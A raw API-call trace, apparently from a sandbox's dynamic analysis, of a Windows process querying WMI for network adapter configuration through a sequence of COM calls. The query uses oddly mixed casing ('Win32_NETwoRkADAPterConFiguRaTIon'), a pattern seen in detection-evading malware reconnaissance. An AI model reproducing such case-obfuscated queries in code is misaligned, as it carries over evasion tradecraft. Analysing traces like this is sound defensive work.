	[0068.618] CoGetContextToken (in: pToken=0x350199d230 | out: pToken=0x350199d230) returned 0x0
	[0068.618] IUnknown:AddRef (This=0x233e399fd08) returned 0x2
	[0068.618] IUnknown:QueryInterface (in: This=0x233e399fd08, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199ce00 | out: ppvObject=0x350199ce00*=0x233e399fd08) returned 0x0
	[0068.618] IUnknown:Release (This=0x233e399fd08) returned 0x2
	[0068.618] IUnknown:Release (This=0x233e399fd08) returned 0x1
	[0068.618] CoGetContextToken (in: pToken=0x350199ce50 | out: pToken=0x350199ce50) returned 0x0
	[0068.618] CoGetContextToken (in: pToken=0x350199cd90 | out: pToken=0x350199cd90) returned 0x0
	[0068.618] IUnknown:AddRef (This=0x233e399fd08) returned 0x2
	[0068.619] IUnknown:QueryInterface (in: This=0x233e399fd08, riid=0x350199ced0*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x350199ceb0 | out: ppvObject=0x350199ceb0*=0x233e39e5ae0) returned 0x0
	[0068.619] IUnknown:Release (This=0x233e399fd08) returned 0x2
	[0068.619] IUnknown:AddRef (This=0x233e39e5ae0) returned 0x3
	[0068.619] IWbemServices:ExecQuery (in: This=0x233e39e5ae0, strQueryLanguage="WQL", strQuery="select * from Win32_NETwoRkADAPterConFiguRaTIon", lFlags=16, pCtx=0x0, ppEnum=0x350199d348 | out: ppEnum=0x350199d348*=0x233fc6f4ae0) returned 0x0
	[0068.621] IUnknown:QueryInterface (in: This=0x233fc6f4ae0, riid=0x7ffbf68f1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199cf58 | out: ppvObject=0x350199cf58*=0x233fc6f4ae8) returned 0x0
	[0068.621] IClientSecurity:QueryBlanket (in: This=0x233fc6f4ae8, pProxy=0x233fc6f4ae0, pAuthnSvc=0x350199cf50, pAuthzSvc=0x350199cf4c, pServerPrincName=0x350199cf78, pAuthnLevel=0x350199cf48, pImpLevel=0x350199cf64, pAuthInfo=0x350199cf88, pCapabilites=0x350199cf60 | out: pAuthnSvc=0x350199cf50*=0xa, pAuthzSvc=0x350199cf4c*=0x0, pServerPrincName=0x350199cf78, pAuthnLevel=0x350199cf48*=0x6, pImpLevel=0x350199cf64*=0x3, pAuthInfo=0x350199cf88, pCapabilites=0x350199cf60*=0x1) returned 0x0
	[0068.621] IUnknown:Release (This=0x233fc6f4ae8) returned 0x1
	[0068.621] IUnknown:QueryInterface (in: This=0x233fc6f4ae0, riid=0x7ffbf68f1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199cef8 | out: ppvObject=0x350199cef8*=0x233e399fea8) returned 0x0
	[0068.621] IUnknown:QueryInterface (in: This=0x233fc6f4ae0, riid=0x7ffbf68f1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199ce88 | out: ppvObject=0x350199ce88*=0x233fc6f4ae8) returned 0x0
	[0068.621] IClientSecurity:SetBlanket (This=0x233fc6f4ae8, pProxy=0x233fc6f4ae0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0068.622] IUnknown:Release (This=0x233fc6f4ae8) returned 0x2
	[0068.622] IUnknown:Release (This=0x233e399fea8) returned 0x1
	[0068.622] CoTaskMemFree (pv=0x233fc650110) 
	[0068.622] IUnknown:QueryInterface (in: This=0x233fc6f4ae0, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199cb30 | out: ppvObject=0x350199cb30*=0x233e399fea8) returned 0x0
	[0068.622] IUnknown:QueryInterface (in: This=0x233e399fea8, riid=0x7ffbf57cd840*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x350199cbb0 | out: ppvObject=0x350199cbb0*=0x0) returned 0x80004002
	[0068.622] IUnknown:QueryInterface (in: This=0x233e399fea8, riid=0x7ffbf57cd2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x350199c948 | out: ppvObject=0x350199c948*=0x0) returned 0x80004002
	[0068.623] IUnknown:AddRef (This=0x233e399fea8) returned 0x3
	[0068.623] CoGetContextToken (in: pToken=0x350199c800 | out: pToken=0x350199c800) returned 0x0
	[0068.623] IUnknown:QueryInterface (in: This=0x233e399fea8, riid=0x7ffbf57cd2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c7c0 | out: ppvObject=0x350199c7c0*=0x233e399fd88) returned 0x0
	[0068.623] IMarshal:GetUnmarshalClass (in: This=0x233e399fd88, riid=0x7ffbf57cd260, pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x350199c7f0 | out: pCid=0x350199c7f0) returned 0x0
	[0068.623] IUnknown:Release (This=0x233e399fd88) returned 0x3
	[0068.623] CoGetContextToken (in: pToken=0x350199c7d0 | out: pToken=0x350199c7d0) returned 0x0
	[0068.623] IUnknown:AddRef (This=0x233e399fea8) returned 0x4
	[0068.623] IUnknown:QueryInterface (in: This=0x233e399fea8, riid=0x7ffbf57cd280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c8e8 | out: ppvObject=0x350199c8e8*=0x233e399fe70) returned 0x0
	[0068.623] IUnknown:Release (This=0x233e399fea8) returned 0x4
	[0068.623] IRpcOptions:Query (in: This=0x233e399fe70, pPrx=0x233e399fea8, dwProperty=2, pdwValue=0x350199c958 | out: pdwValue=0x350199c958) returned 0x80004002
	[0068.623] IUnknown:Release (This=0x233e399fe70) returned 0x3
	[0068.623] IUnknown:Release (This=0x233e399fea8) returned 0x2
	[0068.623] CoGetContextToken (in: pToken=0x350199ccd0 | out: pToken=0x350199ccd0) returned 0x0
	[0068.623] CoGetContextToken (in: pToken=0x350199cc10 | out: pToken=0x350199cc10) returned 0x0
	[0068.623] IUnknown:AddRef (This=0x233e399fea8) returned 0x3
	[0068.624] IUnknown:QueryInterface (in: This=0x233e399fea8, riid=0x350199cd50*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x350199cd30 | out: ppvObject=0x350199cd30*=0x233fc6f4ae0) returned 0x0
	[0068.624] IUnknown:Release (This=0x233e399fea8) returned 0x3
	[0068.624] IUnknown:Release (This=0x233fc6f4ae0) returned 0x2
	[0068.624] IUnknown:Release (This=0x233fc6f4ae0) returned 0x1
	[0068.624] IUnknown:Release (This=0x233e39e5ae0) returned 0x2
	[0068.624] SysStringLen (param_1=0x0) returned 0x0
	[0068.624] IWbemPath:GetNamespaceCount (in: This=0x233e3a02510, puCount=0x350199d370 | out: puCount=0x350199d370*=0x2) returned 0x0
	[0068.624] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199d370*=0x0, pszText=0x0 | out: puBuffLength=0x350199d370*=0x17, pszText=0x0) returned 0x0
	[0068.624] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199d370*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199d370*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.625] CoGetContextToken (in: pToken=0x350199cef0 | out: pToken=0x350199cef0) returned 0x0
	[0068.625] CoGetContextToken (in: pToken=0x350199ce30 | out: pToken=0x350199ce30) returned 0x0
	[0068.625] IUnknown:AddRef (This=0x233e399fea8) returned 0x2
	[0068.625] IUnknown:QueryInterface (in: This=0x233e399fea8, riid=0x350199cf70*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x350199cf50 | out: ppvObject=0x350199cf50*=0x233fc6f4ae0) returned 0x0
	[0068.626] IUnknown:Release (This=0x233e399fea8) returned 0x2
	[0068.626] IUnknown:AddRef (This=0x233fc6f4ae0) returned 0x3
	[0068.626] IEnumWbemClassObject:Clone (in: This=0x233fc6f4ae0, ppEnum=0x350199d3b0 | out: ppEnum=0x350199d3b0*=0x233fc6f4ed0) returned 0x0
	[0068.628] IUnknown:QueryInterface (in: This=0x233fc6f4ed0, riid=0x7ffbf68f1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199d008 | out: ppvObject=0x350199d008*=0x233fc6f4ed8) returned 0x0
	[0068.628] IClientSecurity:QueryBlanket (in: This=0x233fc6f4ed8, pProxy=0x233fc6f4ed0, pAuthnSvc=0x350199d000, pAuthzSvc=0x350199cffc, pServerPrincName=0x350199d028, pAuthnLevel=0x350199cff8, pImpLevel=0x350199d014, pAuthInfo=0x350199d038, pCapabilites=0x350199d010 | out: pAuthnSvc=0x350199d000*=0xa, pAuthzSvc=0x350199cffc*=0x0, pServerPrincName=0x350199d028, pAuthnLevel=0x350199cff8*=0x6, pImpLevel=0x350199d014*=0x3, pAuthInfo=0x350199d038, pCapabilites=0x350199d010*=0x1) returned 0x0
	[0068.628] IUnknown:Release (This=0x233fc6f4ed8) returned 0x1
	[0068.628] IUnknown:QueryInterface (in: This=0x233fc6f4ed0, riid=0x7ffbf68f1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199cfa8 | out: ppvObject=0x350199cfa8*=0x233fc6f59c8) returned 0x0
	[0068.628] IUnknown:QueryInterface (in: This=0x233fc6f4ed0, riid=0x7ffbf68f1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199cf38 | out: ppvObject=0x350199cf38*=0x233fc6f4ed8) returned 0x0
	[0068.628] IClientSecurity:SetBlanket (This=0x233fc6f4ed8, pProxy=0x233fc6f4ed0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0068.629] IUnknown:Release (This=0x233fc6f4ed8) returned 0x2
	[0068.629] IUnknown:Release (This=0x233fc6f59c8) returned 0x1
	[0068.629] CoTaskMemFree (pv=0x233fc64fae0) 
	[0068.629] IUnknown:QueryInterface (in: This=0x233fc6f4ed0, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199cbd0 | out: ppvObject=0x350199cbd0*=0x233fc6f59c8) returned 0x0
	[0068.629] IUnknown:QueryInterface (in: This=0x233fc6f59c8, riid=0x7ffbf57cd840*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x350199cc50 | out: ppvObject=0x350199cc50*=0x0) returned 0x80004002
	[0068.629] IUnknown:QueryInterface (in: This=0x233fc6f59c8, riid=0x7ffbf57cd2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x350199c9e8 | out: ppvObject=0x350199c9e8*=0x0) returned 0x80004002
	[0068.629] IUnknown:AddRef (This=0x233fc6f59c8) returned 0x3
	[0068.630] CoGetContextToken (in: pToken=0x350199c8a0 | out: pToken=0x350199c8a0) returned 0x0
	[0068.630] IUnknown:QueryInterface (in: This=0x233fc6f59c8, riid=0x7ffbf57cd2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c860 | out: ppvObject=0x350199c860*=0x233fc6f58a8) returned 0x0
	[0068.630] IMarshal:GetUnmarshalClass (in: This=0x233fc6f58a8, riid=0x7ffbf57cd260, pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x350199c890 | out: pCid=0x350199c890) returned 0x0
	[0068.630] IUnknown:Release (This=0x233fc6f58a8) returned 0x3
	[0068.630] CoGetContextToken (in: pToken=0x350199c870 | out: pToken=0x350199c870) returned 0x0
	[0068.630] IUnknown:AddRef (This=0x233fc6f59c8) returned 0x4
	[0068.630] IUnknown:QueryInterface (in: This=0x233fc6f59c8, riid=0x7ffbf57cd280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c988 | out: ppvObject=0x350199c988*=0x233fc6f5990) returned 0x0
	[0068.630] IUnknown:Release (This=0x233fc6f59c8) returned 0x4
	[0068.630] IRpcOptions:Query (in: This=0x233fc6f5990, pPrx=0x233fc6f59c8, dwProperty=2, pdwValue=0x350199c9f8 | out: pdwValue=0x350199c9f8) returned 0x80004002
	[0068.630] IUnknown:Release (This=0x233fc6f5990) returned 0x3
	[0068.630] IUnknown:Release (This=0x233fc6f59c8) returned 0x2
	[0068.630] CoGetContextToken (in: pToken=0x350199cd70 | out: pToken=0x350199cd70) returned 0x0
	[0068.630] CoGetContextToken (in: pToken=0x350199ccb0 | out: pToken=0x350199ccb0) returned 0x0
	[0068.630] IUnknown:AddRef (This=0x233fc6f59c8) returned 0x3
	[0068.630] IUnknown:QueryInterface (in: This=0x233fc6f59c8, riid=0x350199cdf0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x350199cdd0 | out: ppvObject=0x350199cdd0*=0x233fc6f4ed0) returned 0x0
	[0068.630] IUnknown:Release (This=0x233fc6f59c8) returned 0x3
	[0068.630] IUnknown:Release (This=0x233fc6f4ed0) returned 0x2
	[0068.631] IUnknown:Release (This=0x233fc6f4ed0) returned 0x1
	[0068.631] IUnknown:Release (This=0x233fc6f4ae0) returned 0x2
	[0068.631] SysStringLen (param_1=0x0) returned 0x0
	[0068.632] CoGetContextToken (in: pToken=0x350199d1f0 | out: pToken=0x350199d1f0) returned 0x0
	[0068.632] CoGetContextToken (in: pToken=0x350199d130 | out: pToken=0x350199d130) returned 0x0
	[0068.632] IUnknown:AddRef (This=0x233fc6f59c8) returned 0x2
	[0068.632] IUnknown:QueryInterface (in: This=0x233fc6f59c8, riid=0x350199d270*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x350199d250 | out: ppvObject=0x350199d250*=0x233fc6f4ed0) returned 0x0
	[0068.632] IUnknown:Release (This=0x233fc6f59c8) returned 0x2
	[0068.632] IUnknown:AddRef (This=0x233fc6f4ed0) returned 0x3
	[0068.632] IEnumWbemClassObject:Reset (This=0x233fc6f4ed0) returned 0x0
	[0068.633] IUnknown:Release (This=0x233fc6f4ed0) returned 0x2
	[0068.635] CoTaskMemAlloc (cb=0x8) returned 0x233fc644c40
	[0068.635] IEnumWbemClassObject:Next (in: This=0x233fc6f4ed0, lTimeout=-1, uCount=0x1, apObjects=0x233fc644c40, puReturned=0x350199d478 | out: apObjects=0x233fc644c40*=0x233e12e61f0, puReturned=0x350199d478*=0x1) returned 0x0
	[0068.726] IUnknown:QueryInterface (in: This=0x233e12e61f0, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c7a0 | out: ppvObject=0x350199c7a0*=0x233e12e61f0) returned 0x0
	[0068.726] IUnknown:QueryInterface (in: This=0x233e12e61f0, riid=0x7ffbf57cd840*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x350199c820 | out: ppvObject=0x350199c820*=0x0) returned 0x80004002
	[0068.726] IUnknown:QueryInterface (in: This=0x233e12e61f0, riid=0x7ffbf57cd2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x350199c5b8 | out: ppvObject=0x350199c5b8*=0x0) returned 0x80004002
	[0068.726] IUnknown:AddRef (This=0x233e12e61f0) returned 0x3
	[0068.726] CoGetContextToken (in: pToken=0x350199c470 | out: pToken=0x350199c470) returned 0x0
	[0068.726] IUnknown:QueryInterface (in: This=0x233e12e61f0, riid=0x7ffbf57cd2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c430 | out: ppvObject=0x350199c430*=0x233e12e61f8) returned 0x0
	[0068.726] IMarshal:GetUnmarshalClass (in: This=0x233e12e61f8, riid=0x7ffbf57cd260, pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x350199c460 | out: pCid=0x350199c460) returned 0x0
	[0068.726] IUnknown:Release (This=0x233e12e61f8) returned 0x3
	[0068.726] CoGetContextToken (in: pToken=0x350199c440 | out: pToken=0x350199c440) returned 0x0
	[0068.726] IUnknown:AddRef (This=0x233e12e61f0) returned 0x4
	[0068.726] IUnknown:QueryInterface (in: This=0x233e12e61f0, riid=0x7ffbf57cd280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c558 | out: ppvObject=0x350199c558*=0x0) returned 0x80004002
	[0068.727] IUnknown:Release (This=0x233e12e61f0) returned 0x3
	[0068.727] IUnknown:Release (This=0x233e12e61f0) returned 0x2
	[0068.727] CoGetContextToken (in: pToken=0x350199c900 | out: pToken=0x350199c900) returned 0x0
	[0068.727] CoGetContextToken (in: pToken=0x350199c840 | out: pToken=0x350199c840) returned 0x0
	[0068.727] IUnknown:AddRef (This=0x233e12e61f0) returned 0x3
	[0068.727] IUnknown:QueryInterface (in: This=0x233e12e61f0, riid=0x350199c980*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x350199c960 | out: ppvObject=0x350199c960*=0x233e12e61f0) returned 0x0
	[0068.727] IUnknown:Release (This=0x233e12e61f0) returned 0x3
	[0068.727] IUnknown:Release (This=0x233e12e61f0) returned 0x2
	[0068.727] IUnknown:Release (This=0x233e12e61f0) returned 0x1
	[0068.727] CoTaskMemFree (pv=0x233fc644c40) 
	[0068.727] CoGetContextToken (in: pToken=0x350199d280 | out: pToken=0x350199d280) returned 0x0
	[0068.727] IUnknown:AddRef (This=0x233e12e61f0) returned 0x2
	[0068.731] IWbemClassObject:Get (in: This=0x233e12e61f0, wszName="__GENUS", lFlags=0, pVal=0x350199d3f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199d3ec*=0, plFlavor=0x350199d3e8*=0 | out: pVal=0x350199d3f0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x350199d3ec*=3, plFlavor=0x350199d3e8*=64) returned 0x0
	[0068.733] IWbemClassObject:Get (in: This=0x233e12e61f0, wszName="__PATH", lFlags=0, pVal=0x350199d390*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199d38c*=0, plFlavor=0x350199d388*=0 | out: pVal=0x350199d390*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=0", varVal2=0x0), pType=0x350199d38c*=8, plFlavor=0x350199d388*=64) returned 0x0
	[0068.733] SysStringLen (param_1="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=0") returned 0x3f
	[0068.733] CoGetObjectContext (in: riid=0x350199d328*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x350199d320 | out: ppv=0x350199d320*=0x233e121be30) returned 0x0
	[0068.733] IComThreadingInfo:GetCurrentApartmentType (in: This=0x233e121be30, pAptType=0x350199d340 | out: pAptType=0x350199d340*=1) returned 0x0
	[0068.733] IUnknown:QueryInterface (in: This=0x233e121be30, riid=0x233e4523c48*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x350199d448 | out: ppvObject=0x350199d448*=0x0) returned 0x80004002
	[0068.733] IUnknown:Release (This=0x233e121be30) returned 0x2
	[0068.734] CoGetClassObject (in: rclsid=0x233fc685dd8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7ffbf57cd250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x350199c9b0 | out: ppv=0x350199c9b0*=0x233fc7042a0) returned 0x0
	[0068.734] WbemDefPath:IUnknown:QueryInterface (in: This=0x233fc7042a0, riid=0x7ffbf57cd2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x350199c6c0 | out: ppvObject=0x350199c6c0*=0x0) returned 0x80004002
	[0068.734] WbemDefPath:IClassFactory:CreateInstance (in: This=0x233fc7042a0, pUnkOuter=0x0, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c6a8 | out: ppvObject=0x350199c6a8*=0x233e3a03650) returned 0x0
	[0068.734] IUnknown:QueryInterface (in: This=0x233e3a03650, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c5b0 | out: ppvObject=0x350199c5b0*=0x233e3a03650) returned 0x0
	[0068.734] IUnknown:QueryInterface (in: This=0x233e3a03650, riid=0x7ffbf57cd840*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x350199c630 | out: ppvObject=0x350199c630*=0x0) returned 0x80004002
	[0068.734] IUnknown:AddRef (This=0x233e3a03650) returned 0x3
	[0068.734] CoGetContextToken (in: pToken=0x350199c280 | out: pToken=0x350199c280) returned 0x0
	[0068.734] IUnknown:QueryInterface (in: This=0x233e3a03650, riid=0x7ffbf57cd2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c240 | out: ppvObject=0x350199c240*=0x233fc7043a0) returned 0x0
	[0068.735] IMarshal:GetUnmarshalClass (in: This=0x233fc7043a0, riid=0x7ffbf57cd260, pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x350199c270 | out: pCid=0x350199c270) returned 0x0
	[0068.735] IUnknown:Release (This=0x233fc7043a0) returned 0x3
	[0068.735] CoGetContextToken (in: pToken=0x350199c250 | out: pToken=0x350199c250) returned 0x0
	[0068.735] IUnknown:AddRef (This=0x233e3a03650) returned 0x4
	[0068.735] IUnknown:QueryInterface (in: This=0x233e3a03650, riid=0x7ffbf57cd280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c368 | out: ppvObject=0x350199c368*=0x0) returned 0x80004002
	[0068.735] IUnknown:Release (This=0x233e3a03650) returned 0x3
	[0068.735] IUnknown:Release (This=0x233e3a03650) returned 0x2
	[0068.735] WbemDefPath:IUnknown:Release (This=0x233fc7042a0) returned 0x0
	[0068.735] IUnknown:Release (This=0x233e3a03650) returned 0x1
	[0068.735] CoGetContextToken (in: pToken=0x350199cf80 | out: pToken=0x350199cf80) returned 0x0
	[0068.735] CoGetContextToken (in: pToken=0x350199cec0 | out: pToken=0x350199cec0) returned 0x0
	[0068.735] IUnknown:AddRef (This=0x233e3a03650) returned 0x2
	[0068.735] IUnknown:QueryInterface (in: This=0x233e3a03650, riid=0x350199d000*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x350199cfe0 | out: ppvObject=0x350199cfe0*=0x233e3a03650) returned 0x0
	[0068.735] IUnknown:Release (This=0x233e3a03650) returned 0x2
	[0068.735] IUnknown:Release (This=0x233e3a03650) returned 0x1
	[0068.736] CoGetContextToken (in: pToken=0x350199d100 | out: pToken=0x350199d100) returned 0x0
	[0068.736] CoGetContextToken (in: pToken=0x350199d040 | out: pToken=0x350199d040) returned 0x0
	[0068.736] IUnknown:AddRef (This=0x233e3a03650) returned 0x2
	[0068.736] IUnknown:QueryInterface (in: This=0x233e3a03650, riid=0x350199d180*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x350199d160 | out: ppvObject=0x350199d160*=0x233e3a03650) returned 0x0
	[0068.736] IUnknown:Release (This=0x233e3a03650) returned 0x2
	[0068.736] IUnknown:AddRef (This=0x233e3a03650) returned 0x3
	[0068.736] IWbemPath:SetText (This=0x233e3a03650, uMode=0x4, pszPath="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=0") returned 0x0
	[0068.736] IUnknown:Release (This=0x233e3a03650) returned 0x2
	[0068.736] IWbemPath:GetNamespaceCount (in: This=0x233e3a02510, puCount=0x350199d3c0 | out: puCount=0x350199d3c0*=0x2) returned 0x0
	[0068.736] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199d3c0*=0x0, pszText=0x0 | out: puBuffLength=0x350199d3c0*=0x17, pszText=0x0) returned 0x0
